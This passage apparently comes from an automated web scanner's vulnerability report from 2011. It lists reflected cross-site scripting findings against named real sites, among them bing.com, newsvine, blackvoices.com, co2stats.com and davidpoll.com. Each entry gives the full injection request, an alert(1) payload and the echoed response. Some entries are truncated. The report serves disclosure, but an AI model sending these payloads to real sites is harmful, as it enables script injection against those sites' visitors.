The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d5f8f'-alert(1)-'1d3891b1941 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ULA/iview/296652509/direct;/01?click=&d5f8f'-alert(1)-'1d3891b1941=1 HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6315
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 01:35:02 GMT

<html><head><title>flash_300x250_HD_PC_promo</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;margin:
...[SNIP]...

if ( "%OOB%" == "1" )
_strContentSEL1295550373680 = _strContentSEL1295550373680.replace(/!~!click!~!/g,'');
else
_strContentSEL1295550373680 = _strContentSEL1295550373680.replace(/!~!click!~!/g,'&d5f8f'-alert(1)-'1d3891b1941=1');
}
else
{
_strContentSEL1295550373680 = '<a target="_blank" href="http://clk.atdmt.com/go/296652509/direct;ai.200329627;ct.1/01/" onclick="if(\'&d5f8f'-alert(1)-'1d3891b1941=1\')(new Image)
...[SNIP]...

5.294. http://redcated/ULA/iview/296652509/direct [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://redcated
Path:	/ULA/iview/296652509/direct

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5d075"-alert(1)-"276dcba3107 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ULA/iview/296652509/direct;/01?click=&5d075"-alert(1)-"276dcba3107=1 HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6315
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 01:34:57 GMT

<html><head><title>flash_300x250_HD_PC_promo</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;margin:
...[SNIP]...
if (navigator.userAgent.toLowerCase().indexOf("webtv") != -1)
{
bIsRightVersion = (2 >= nRequiredVersion);
}
}
}
detectPluginSEL1295550373680();
var _SEL1295550373680_Instance =
{
click : "&5d075"-alert(1)-"276dcba3107=1",
clickThruUrl: "http://clk.redcated/go/296652509/direct;ai.200329627;ct.$num$/01/",
imgs : []
};
if (!window.armapi_a1_a1)
{
var armapi_a1_a1 =
{
initialize : function(unique_id){},
click
...[SNIP]...

5.295. http://wbenedetti.newsvine.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wbenedetti.newsvine.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2efa1"-alert(1)-"fb67b00e4a1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /?2efa1"-alert(1)-"fb67b00e4a1=1 HTTP/1.1
Host: wbenedetti.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:05:22 GMT
Server: Apache/2.2.14 (Debian)
Vary: negotiate
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=45f73cc22cc66ac775a363e022c73cd5; expires=Sat, 25-Jan-2031 03:05:22 GMT; path=/; domain=.newsvine.com
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 80845

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
"";currentCommentBox = commentId;var renderedCommentBox = renderCommentBox ("http://www.newsvine.com/_action","http://www.polls.newsvine.com/_vine/images/_/","1654552","http://wbenedetti.newsvine.com/?2efa1"-alert(1)-"fb67b00e4a1=1", 0,commentId, "", "", groupId, friendListId, threadId, privateLabel, "01", -1);getElement("dynamicCommentBox_"+commentId).innerHTML = renderedCommentBox;placeSpellChecker ("commentsTextDiv_"+commen
...[SNIP]...

5.296. http://www.bing.com/local/ypdefault.aspx [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bing.com
Path:	/local/ypdefault.aspx

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4d9b0'-alert(1)-'2db30f3531a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /local/4d9b0'-alert(1)-'2db30f3531a HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-BM-TraceID: b71a9b3017a54017a35566ee283bce63
SearchRequest: Microsoft.VirtualEarth.ServicesProxy.SearchServiceV2.SearchAdvancedRequest
SearchRequestState: Success
X-AspNet-Version: 2.0.50727
X-BM-Srv: EWRM001610
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:09:45 GMT
Content-Length: 29845
Connection: close
Set-Cookie: BID=aad102ff367f44958a5d618fc0b05aaf; path=/local/4d9b0'-alert(1)-'2db30f3531a
Set-Cookie: CID=a338111f9c4c4497b06acadac82d3793; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/local/4d9b0'-alert(1)-'2db30f3531a
Set-Cookie: CDate=1/30/2011 5:09:45 PM; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/local/4d9b0'-alert(1)-'2db30f3531a
Set-Cookie: VE_LSV=cache=0; path=/local/4d9b0'-alert(1)-'2db30f3531a
Set-Cookie: _SS=SID=D461A8D8FB0847019B5374FB460A2CCE; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:09:45 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c706a350569bb465b91fab01f1e55ad73; expires=Tue, 29-Jan-2013 17:09:45 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621029&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:09:45 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http://schemas.li
...[SNIP]...
e=or3,preallocation=0';window.CosmosIP = '173.193.214.243';window.ScriptSubDomain = 'http://sc1.maps.live.com/localsearch';window.mode = 'local';window.FooterID = 'sb_foot';window.CookiePath = '/local/4d9b0'-alert(1)-'2db30f3531a';</script>
...[SNIP]...

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.blackvoices.com
Path:	/$\|http:/latino.aol.com/$\|.ivillage.com.*/1\|www.ivillage.com/(celeb-news\|entertainment-photos\|tv\|for-kids\|video\|entertainment\|movies\|food\|recipes\|table-talk\|food-for-kids\|food-advice\|food-news\|food-video

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9b1ec"-alert(1)-"52123b4735c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /$|http:9b1ec"-alert(1)-"52123b4735c/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video HTTP/1.1
Host: www.blackvoices.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
set-cookie: dcisid=3244900364.2614838093.3830776576; path=/
X-RSP: 1
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Sun, 30 Jan 2011 01:52:20 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
Content-Length: 31115
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<!--
s_265.mmxgo=true;
s_265.pageName="Page Not Found";
s_265.channel="us.bv";
s_265.trackExternalLinks="true";
s_265.prop1="$|http:9b1ec"-alert(1)-"52123b4735c";
s_265.pfxID="bkv";
s_265.disablepihost=false;
s_265.prop12="http://www.blackvoices.com/$|http:9b1ec\"-alert(1)-\"52123b4735c/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertain
...[SNIP]...

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.blackvoices.com
Path:	/$\|http:/latino.aol.com/$\|.ivillage.com.*/1\|www.ivillage.com/(celeb-news\|entertainment-photos\|tv\|for-kids\|video\|entertainment\|movies\|food\|recipes\|table-talk\|food-for-kids\|food-advice\|food-news\|food-video

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a3897</script><script>alert(1)</script>770d674eae7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /$|http:/latino.aol.coma3897</script><script>alert(1)</script>770d674eae7/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video HTTP/1.1
Host: www.blackvoices.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
set-cookie: dcisid=3244834828.1155220301.3818652416; path=/
X-RSP: 1
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Sun, 30 Jan 2011 01:52:21 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
Content-Length: 31109
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
Not Found";
s_265.channel="us.bv";
s_265.trackExternalLinks="true";
s_265.prop1="$|http:";
s_265.pfxID="bkv";
s_265.disablepihost=false;
s_265.prop12="http://www.blackvoices.com/$|http:/latino.aol.coma3897</script><script>alert(1)</script>770d674eae7/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video";
s_265.linkInternal
...[SNIP]...

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.blackvoices.com
Path:	/$\|http:/latino.aol.com/$\|.ivillage.com.*/1\|www.ivillage.com/(celeb-news\|entertainment-photos\|tv\|for-kids\|video\|entertainment\|movies\|food\|recipes\|table-talk\|food-for-kids\|food-advice\|food-news\|food-video

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e4b86</script><script>alert(1)</script>2267ebd2b1e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /$|http:/latino.aol.com/$|.ivillage.com.*e4b86</script><script>alert(1)</script>2267ebd2b1e/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video HTTP/1.1
Host: www.blackvoices.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
set-cookie: dcisid=3240247308.903299917.585433600; path=/
X-RSP: 1
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Sun, 30 Jan 2011 01:52:23 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
Content-Length: 31107
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
.channel="us.bv";
s_265.trackExternalLinks="true";
s_265.prop1="$|http:";
s_265.pfxID="bkv";
s_265.disablepihost=false;
s_265.prop12="http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*e4b86</script><script>alert(1)</script>2267ebd2b1e/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video";
s_265.linkInternalFilters="javascrip
...[SNIP]...

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.blackvoices.com
Path:	/$\|http:/latino.aol.com/$\|.ivillage.com.*/1\|www.ivillage.com/(celeb-news\|entertainment-photos\|tv\|for-kids\|video\|entertainment\|movies\|food\|recipes\|table-talk\|food-for-kids\|food-advice\|food-news\|food-video

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8b318</script><script>alert(1)</script>cd70b89820e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com8b318</script><script>alert(1)</script>cd70b89820e/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video HTTP/1.1
Host: www.blackvoices.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
set-cookie: dcisid=2393099708.970474317.387515136; path=/
X-RSP: 1
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Sun, 30 Jan 2011 01:52:24 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
Content-Length: 31109
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
_265.trackExternalLinks="true";
s_265.prop1="$|http:";
s_265.pfxID="bkv";
s_265.disablepihost=false;
s_265.prop12="http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com8b318</script><script>alert(1)</script>cd70b89820e/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video";
s_265.linkInternalFilters="javascript:,aol.com,blackvoi
...[SNIP]...

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.blackvoices.com
Path:	/$\|http:/latino.aol.com/$\|.ivillage.com.*/1\|www.ivillage.com/(celeb-news\|entertainment-photos\|tv\|for-kids\|video\|entertainment\|movies\|food\|recipes\|table-talk\|food-for-kids\|food-advice\|food-news\|food-video

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f9d46</script><script>alert(1)</script>07c8793dc9d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-videof9d46</script><script>alert(1)</script>07c8793dc9d HTTP/1.1
Host: www.blackvoices.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
set-cookie: dcisid=2334838204.1239171917.4086825728; path=/
X-RSP: 1
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Sun, 30 Jan 2011 01:52:25 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
Content-Length: 31107
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-videof9d46</script><script>alert(1)</script>07c8793dc9d";
s_265.linkInternalFilters="javascript:,aol.com,blackvoices.com";
var s_code=s_265.t();
if(s_code)document.write(s_code)
-->
...[SNIP]...

5.302. http://www.bloglines.com/sub/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bloglines.com
Path:	/sub/

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.co2stats.com
Path:	/propres.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bb89e'%3balert(1)//42e64c5198f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bb89e';alert(1)//42e64c5198f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /propres.php?s=/bb89e'%3balert(1)//42e64c5198f1138 HTTP/1.1
Host: www.co2stats.com
Proxy-Connection: keep-alive
Referer: http://news.ycombinator.com/news
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 15:05:00 GMT
Server: Apache/2.2.17
Content-Length: 3370
Content-Type: text/html

var co2stats_width = 0, co2stats_height = 0;
if( typeof( window.innerWidth ) == 'number' ) {
//Non-IE
co2stats_width = window.innerWidth;
co2stats_height = window.innerHeight;
} else if( documen
...[SNIP]...
<a href="http://www.co2stats.com/certpro.php?s=/bb89e';alert(1)//42e64c5198f1138&ref='+location.href+'" onmouseover="co2stats_onhover();" onmouseout="co2stats_onmouseout();" onclick="window.open(\'http://www.co2stats.com/certpro.php?s=/bb89e';alert(1)//42e64c5198f1138&ref='+lo
...[SNIP]...

5.306. http://www.co2stats.com/propres.php [s parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.co2stats.com
Path:	/propres.php

Issue detail

The value of the s request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b06c6'%3balert(1)//9c21dfc1ee was submitted in the s parameter. This input was echoed as b06c6';alert(1)//9c21dfc1ee in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /propres.php?s=1138b06c6'%3balert(1)//9c21dfc1ee HTTP/1.1
Host: www.co2stats.com
Proxy-Connection: keep-alive
Referer: http://news.ycombinator.com/news
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 15:04:48 GMT
Server: Apache/2.2.17
Content-Length: 3102
Content-Type: text/html

var co2stats_width = 0, co2stats_height = 0;
if( typeof( window.innerWidth ) == 'number' ) {
//Non-IE
co2stats_width = window.innerWidth;
co2stats_height = window.innerHeight;
} else if( documen
...[SNIP]...
<a href="http://www.co2stats.com/certpro.php?s=1138b06c6';alert(1)//9c21dfc1ee&ref='+location.href+'" onmouseover="co2stats_onhover();" onmouseout="co2stats_onmouseout();" onclick="window.open(\'http://www.co2stats.com/certpro.php?s=1138b06c6';alert(1)//9c21dfc1ee&ref='+location
...[SNIP]...

5.307. http://www.davidpoll.com/2011/01/26/quickly-building-a-trial-mode-for-a-windows-phone-application/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.davidpoll.com
Path:	/2011/01/26/quickly-building-a-trial-mode-for-a-windows-phone-application/

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 492d1'><script>alert(1)</script>6033be6539a was submitted in the REST URL parameter 4. This input was echoed as 492d1\'><script>alert(1)</script>6033be6539a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/01/26/quickly-building-a-trial-mode-for-a-windows-phone-application492d1'><script>alert(1)</script>6033be6539a/ HTTP/1.1
Host: www.davidpoll.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 29 Jan 2011 23:24:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
X-Pingback: http://www.davidpoll.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: PHPSESSID=3a5cef17df808cf07e6579d534901881; path=/
Last-Modified: Sat, 29 Jan 2011 23:24:51 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29422

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head profile="http://gmpg.org/xfn/11">
<meta http-equiv
...[SNIP]...
<a id='flag_en' href='http://www.davidpoll.com/2011/01/26/quickly-building-a-trial-mode-for-a-windows-phone-application492d1\'><script>alert(1)</script>6033be6539a/' hreflang='en' >
...[SNIP]...

5.308. http://www.davidpoll.com/2011/01/26/quickly-building-a-trial-mode-for-a-windows-phone-application/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.davidpoll.com
Path:	/2011/01/26/quickly-building-a-trial-mode-for-a-windows-phone-application/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload be141'><script>alert(1)</script>17b62cd0d2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as be141\'><script>alert(1)</script>17b62cd0d2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/01/26/quickly-building-a-trial-mode-for-a-windows-phone-application/?be141'><script>alert(1)</script>17b62cd0d2=1 HTTP/1.1
Host: www.davidpoll.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:24:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://www.davidpoll.com/xmlrpc.php
Link: <http://www.davidpoll.com/?p=403>; rel=shortlink
Set-Cookie: PHPSESSID=a28e55f39dc8a2744271fd0ad7b381f0; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57076

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head profile="http://gmpg.org/xfn/11">
<meta http-equiv
...[SNIP]...
<a id='flag_en' href='http://www.davidpoll.com/2011/01/26/quickly-building-a-trial-mode-for-a-windows-phone-application/?be141\'><script>alert(1)</script>17b62cd0d2=1' hreflang='en' >
...[SNIP]...

5.309. http://www.davidpoll.com/wp-content/plugins/tweetable/main_css.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.davidpoll.com
Path:	/wp-content/plugins/tweetable/main_css.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5ad37'><script>alert(1)</script>899882eab2b was submitted in the REST URL parameter 1. This input was echoed as 5ad37\'><script>alert(1)</script>899882eab2b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content5ad37'><script>alert(1)</script>899882eab2b/plugins/tweetable/main_css.css HTTP/1.1
Host: www.davidpoll.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=136124068.1296350336.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; PHPSESSID=0327f22e76c677f66a17b5702dd9d632; __utma=136124068.1574482894.1296350336.1296350336.1296350336.1; __utmc=136124068; __utmb=136124068.1.10.1296350336;

Response

HTTP/1.1 404 Not Found
Date: Sun, 30 Jan 2011 01:22:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
X-Pingback: http://www.davidpoll.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sun, 30 Jan 2011 01:22:34 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29039

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head profile="http://gmpg.org/xfn/11">
<meta http-equiv
...[SNIP]...
<a id='flag_en' href='http://www.davidpoll.com/wp-content5ad37\'><script>alert(1)</script>899882eab2b/plugins/tweetable/main_css.css' hreflang='en' >
...[SNIP]...

5.310. http://www.davidpoll.com/wp-content/plugins/tweetable/main_css.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.davidpoll.com
Path:	/wp-content/plugins/tweetable/main_css.css

Issue detail

